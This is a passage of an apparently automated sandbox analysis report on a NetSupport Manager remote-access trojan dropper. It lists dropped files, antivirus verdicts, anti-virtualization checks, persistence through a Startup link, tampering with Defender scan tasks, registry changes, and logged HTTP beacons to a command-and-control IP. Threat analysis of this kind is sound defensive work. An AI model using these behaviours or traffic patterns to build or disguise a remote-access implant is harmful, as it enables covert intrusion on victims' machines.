  706. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcigina.dll"
  707.  
  708.  
  709. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIHOOKS.DLL"
  710.  
  711.  
  712. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIinv.dll"
  713.  
  714.  
  715. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIMON.DLL"
  716.  
  717.  
  718. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcimonhook.dll"
  719.  
  720.  
  721. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIMSG.DLL"
  722.  
  723.  
  724. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcisys.sys"
  725.  
  726.  
  727. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIVDD.DLL"
  728.  
  729.  
  730. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pscrinst.dll"
  731.  
  732.  
  733. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\remcmdstub.exe"
  734.  
  735.  
  736. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\shfolder.dll"
  737.  
  738.  
  739. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\TCBR32.DLL"
  740.  
  741.  
  742. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\TCCTL32.DLL"
  743.  
  744.  
  745. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\VolumeControlWXP.DLL"
  746.  
  747.  
  748. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\WdfCoInstaller01005.dll"
  749.  
  750.  
  751. "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport"
  752.  
  753.  
  754.  
  755.  
  756. "Description": "Retrieves Windows ProductID, probably to fingerprint the sandbox",
  757. "Details":
  758.  
  759.  
  760. "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
  761. "Details":
  762.  
  763. "K7GW": "Riskware ( 0040eff71 )"
  764.  
  765.  
  766. "K7AntiVirus": "Riskware ( 0040eff71 )"
  767.  
  768.  
  769. "Invincea": "heuristic"
  770.  
  771.  
  772. "Kaspersky": "not-a-virus:RemoteAdmin.Win32.NetSup.i"
  773.  
  774.  
  775. "NANO-Antivirus": "Trojan.Win32.KeyLogger.fteyzh"
  776.  
  777.  
  778. "Paloalto": "generic.ml"
  779.  
  780.  
  781. "Sophos": "Generic PUA IM (PUA)"
  782.  
  783.  
  784. "DrWeb": "Trojan.KeyLogger.41051"
  785.  
  786.  
  787. "McAfee-GW-Edition": "BehavesLike.Win32.AdwareLinkury.tc"
  788.  
  789.  
  790. "Trapmine": "malicious.high.ml.score"
  791.  
  792.  
  793. "FireEye": "Generic.mg.29b47d1f3d4417b4"
  794.  
  795.  
  796. "Cyren": "W32/S-deaeb957!Eldorado"
  797.  
  798.  
  799. "Microsoft": "Trojan:Win32/Fuerboos.C!cl"
  800.  
  801.  
  802. "Acronis": "suspicious"
  803.  
  804.  
  805. "Cylance": "Unsafe"
  806.  
  807.  
  808. "CrowdStrike": "win/malicious_confidence_80% (W)"
  809.  
  810.  
  811. "Qihoo-360": "Win32/Virus.RemoteAdmin.f8d"
  812.  
  813.  
  814.  
  815.  
  816. "Description": "Checks the presence of disk drives in the registry, possibly for anti-virtualization",
  817. "Details":
  818.  
  819.  
  820. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  821. "Details":
  822.  
  823.  
  824. "Description": "Detects VirtualBox through the presence of a file",
  825. "Details":
  826.  
  827. "file": "C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe"
  828.  
  829.  
  830.  
  831.  
  832. "Description": "Detects VirtualBox through the presence of a registry key",
  833. "Details":
  834.  
  835.  
  836. "Description": "Collects information to fingerprint the system",
  837. "Details":
  838.  
  839.  
  840.  
  841. * Started Service:
  842. "TapiSrv",
  843. "WerSvc",
  844. "W32Time"
  845.  
  846.  
  847. * Mutexes:
  848. "DefaultTabtip-MainUI",
  849. "CicLoadWinStaWinSta0",
  850. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  851. "Local\\WERReportingForProcess2916",
  852. "Global\\\\xe5\\x88\\x90\\xc2\\xb1",
  853. "Global\\\\xed\\x95\\xb0\\xc7\\x90",
  854. "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1",
  855. "Global\\ADAP_WMI_ENTRY",
  856. "Global\\RefreshRA_Mutex",
  857. "Global\\RefreshRA_Mutex_Lib",
  858. "Global\\RefreshRA_Mutex_Flag"
  859.  
  860.  
  861. * Modified Files:
  862. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\__tmp_rar_sfx_access_check_18222468",
  863. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport.exe",
  864. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\__tmp_rar_sfx_access_check_18223250",
  865. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\AudioCapture.dll",
  866. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\clhook4.dll",
  867. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.exe",
  868. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.ini",
  869. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\Control.kbd",
  870. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\CryptPak.dll",
  871. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\DBI.EXE",
  872. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.dll",
  873. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.INF",
  874. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.sys",
  875. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\HTCTL32.DLL",
  876. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\IPBR32.DLL",
  877. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\IPCTL32.DLL",
  878. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\msvcr100.dll",
  879. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBBR32.DLL",
  880. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\Nbctl32.dll",
  881. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA0.DLL",
  882. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA1.DLL",
  883. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA2.DLL",
  884. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA3.DLL",
  885. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA4.DLL",
  886. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA5.DLL",
  887. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA6.DLL",
  888. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA7.DLL",
  889. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nskbfltr.inf",
  890. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nskbfltr.sys",
  891. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSM.ini",
  892. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSM.LIC",
  893. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nsmexec.exe",
  894. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nspscr.inf",
  895. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nspscr.sys",
  896. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSToast.exe",
  897. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcicapi.dll",
  898. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcicfgui.exe",
  899. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCICHEK.DLL",
  900. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCICL32.DLL",
  901. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pciconn.exe",
  902. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcigina.dll",
  903. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIHOOKS.DLL",
  904. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIinv.dll",
  905. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIMON.DLL",
  906. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcimonhook.dll",
  907. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIMSG.DLL",
  908. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcisys.sys",
  909. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIVDD.DLL",
  910. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pscrinst.dll",
  911. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\remcmdstub.exe",
  912. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\shfolder.dll",
  913. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\TCBR32.DLL",
  914. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\TCCTL32.DLL",
  915. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\VolumeControlWXP.DLL",
  916. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\WdfCoInstaller01005.dll",
  917. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport",
  918. "\\??\\PIPE\\srvsvc",
  919. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.lnk",
  920. "C:\\Users\\user\\AppData\\Local\\NetSupport\\NetSupport Manager\\Host_HF.bin",
  921. "\\??\\Scsi0:",
  922. "\\??\\Scsi1:",
  923. "\\??\\PIPE\\wkssvc",
  924. "C:\\Users\\user\\AppData\\Local\\NetSupport\\NetSupport Manager\\Host_SW.bin",
  925. "C:\\Users\\user\\AppData\\Local\\NetSupport\\NetSupport Manager\\Host_HW.bin",
  926. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  927. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  928. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7fc2b1f9-2cd2-4f46-bdc4-a56cd589e09e",
  929. "\\??\\NDISTAPI",
  930. "\\??\\NDProxy",
  931. "\\Device\\LanmanDatagramReceiver",
  932. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  933. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
  934. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  935. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  936. "\\??\\PIPE\\lsarpc",
  937. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC403.tmp.appcompat.txt",
  938. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8E6.tmp.WERInternalMetadata.xml",
  939. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC906.tmp.hdmp",
  940. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDD6A.tmp.mdmp",
  941. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\WERC403.tmp.appcompat.txt",
  942. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\WERC8E6.tmp.WERInternalMetadata.xml",
  943. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\WERC906.tmp.hdmp",
  944. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\WERDD6A.tmp.mdmp",
  945. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\Report.wer",
  946. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\Report.wer.tmp",
  947. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h",
  948. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl.h",
  949. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.ini",
  950. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  951. "\\??\\WMIDataDevice"
  952.  
  953.  
  954. * Deleted Files:
  955. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\__tmp_rar_sfx_access_check_18222468",
  956. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\__tmp_rar_sfx_access_check_18223250",
  957. "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\bin\\StoreApp.bin",
  958. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask",
  959. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
  960. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
  961. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC403.tmp",
  962. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC403.tmp.appcompat.txt",
  963. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8E6.tmp",
  964. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8E6.tmp.WERInternalMetadata.xml",
  965. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC906.tmp",
  966. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC906.tmp.hdmp",
  967. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDD6A.tmp",
  968. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDD6A.tmp.mdmp",
  969. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\Report.wer.tmp",
  970. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl.h",
  971. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h"
  972.  
  973.  
  974. * Modified Registry Keys:
  975. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\tapi32",
  976. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\EnableFileTracing",
  977. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\EnableConsoleTracing",
  978. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\FileTracingMask",
  979. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\ConsoleTracingMask",
  980. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\MaxFileSize",
  981. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\FileDirectory",
  982. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  983. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@\"%windir%\\System32\\ie4uinit.exe\",-738",
  984. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  985. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  986. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\tapisrv",
  987. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\EnableFileTracing",
  988. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\EnableConsoleTracing",
  989. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\FileTracingMask",
  990. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\ConsoleTracingMask",
  991. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\MaxFileSize",
  992. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\FileDirectory",
  993. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\DomainName",
  994. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\NDPTSP",
  995. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\EnableFileTracing",
  996. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\EnableConsoleTracing",
  997. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\FileTracingMask",
  998. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\ConsoleTracingMask",
  999. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\MaxFileSize",
  1000. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\FileDirectory",
  1001. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\Perf1",
  1002. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\Perf2",
  1003. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities\\MediaModes",
  1004. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\7FC2B1F9-2CD2-4F46-BDC4-A56CD589E09E\\Path",
  1005. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\7FC2B1F9-2CD2-4F46-BDC4-A56CD589E09E\\Hash",
  1006. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows Defender\\MP Scheduled Scan\\Id",
  1007. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows Defender\\MP Scheduled Scan\\Index",
  1008. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\7FC2B1F9-2CD2-4F46-BDC4-A56CD589E09E\\Triggers",
  1009. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\7FC2B1F9-2CD2-4F46-BDC4-A56CD589E09E\\DynamicInfo",
  1010. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  1011. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  1012. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  1013. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-00000000-0000-0000-0000-000000000000",
  1014. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dllMofResourceName",
  1015. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.muiMofResourceName",
  1016. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sysACPIMOFResource",
  1017. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.muiACPIMOFResource",
  1018. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sysMofResourceName",
  1019. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.muiMofResourceName",
  1020. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sysMofResource",
  1021. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.muiMofResource",
  1022. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sysHDAudioMofName",
  1023. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.muiHDAudioMofName",
  1024. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sysPROCESSORWMI",
  1025. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.muiPROCESSORWMI",
  1026. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYSPortclsMof",
  1027. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.muiPortclsMof",
  1028. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  1029.  
  1030.  
  1031. * Deleted Registry Keys:
  1032. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\TAPISRVSCPGUID",
  1033. "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities\\RequestMediaCall",
  1034. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
  1035.  
  1036.  
  1037. * DNS Communications:
  1038.  
  1039. "type": "A",
  1040. "request": "geo.netsupportsoftware.com",
  1041. "answers":
  1042.  
  1043. "data": "62.172.138.35",
  1044. "type": "A"
  1045.  
  1046.  
  1047. "data": "geograph.netsupportsoftware.com",
  1048. "type": "CNAME"
  1049.  
  1050.  
  1051. "data": "195.171.92.116",
  1052. "type": "A"
  1053.  
  1054.  
  1055.  
  1056.  
  1057.  
  1058. * Domains:
  1059.  
  1060. "ip": "195.171.92.116",
  1061. "domain": "geo.netsupportsoftware.com"
  1062.  
  1063.  
  1064.  
  1065. * Network Communication - ICMP:
  1066.  
  1067. * Network Communication - HTTP:
  1068.  
  1069. "count": 1,
  1070. "body": "CMD=POLL\nINFO=1\nACK=1\n",
  1071. "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
  1072. "user-agent": "NetSupport Manager/1.3",
  1073. "method": "POST",
  1074. "host": "5.45.73.63",
  1075. "version": "1.1",
  1076. "path": "http://5.45.73.63/fakeurl.htm",
  1077. "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
  1078. "port": 4151
  1079.  
  1080.  
  1081. "count": 1,
  1082. "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\x99\\xc3\\xda\\xcel\\xd7\\\\xe7\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4j\\x94_mb\\xfd\\xaf\\xa3\\xc6v\\x14N\\xc4\\xd9\\xa5\\xc96\\x8c\\x17\\x90\\xb3\\xf1\\x1b|\\xbb\\xb4\\x0f\\x1ae\\xe79\\x92\\xe4\\x1a\\xdb\\xbcO\\xd0D\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  1083. "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
  1084. "user-agent": "NetSupport Manager/1.3",
  1085. "method": "POST",
  1086. "host": "5.45.73.63",
  1087. "version": "1.1",
  1088. "path": "http://5.45.73.63/fakeurl.htm",
  1089. "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\x99\\xc3\\xda\\xcel\\xd7\\\\xe7\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 